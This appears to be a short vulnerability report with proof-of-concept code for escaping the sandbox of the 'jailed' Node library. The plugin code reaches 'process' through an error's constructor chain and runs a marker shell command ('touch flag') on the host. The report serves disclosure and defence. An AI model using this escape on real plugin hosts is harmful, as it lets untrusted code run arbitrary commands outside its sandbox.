- Jailed version: 0.3.1
- Node version: 18.15.0
- run-jailed.js
// Host-side loader: starts ./test_case.js as a jailed plugin.
const jailed = require('jailed');
// Empty export object: the host hands no functions to the plugin.
const hostApi = {};
const plugin = new jailed.Plugin('./test_case.js', hostApi);
// NOTE(review): presumably the contents of ./test_case.js, the plugin file that
// run-jailed.js loads into the sandbox; the page does not label this snippet.
// Defensive takeaway, per this report: with jailed 0.3.1 on Node 18.15.0 the
// plugin sandbox does not contain this code, so it should not be relied on as
// the only isolation boundary for untrusted plugins.
try{
// Bare call that the report names as the trigger; it is expected to throw so
// that the catch branch below receives an error object.
valueOf()
} catch(pp){
// The caught error's constructor chain is used to evaluate 'return process';
// the returned object is then used to load child_process and run a marker
// command. A file named 'flag' appearing on the host is the evidence that
// sandboxed code executed a command outside the sandbox.
pp.constructor.constructor('return process')().mainModule.require('child_process').execSync('touch flag');
}
// Plugin-side call that disconnects the plugin from the application.
application.disconnect();
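The sandbox can be escaped by calling the `valueOf()` function: the call throws, and the caught error object gives the plugin a constructor chain through which it obtains the `process` object.
With the `process` module, we can then execute arbitrary shell commands on the host.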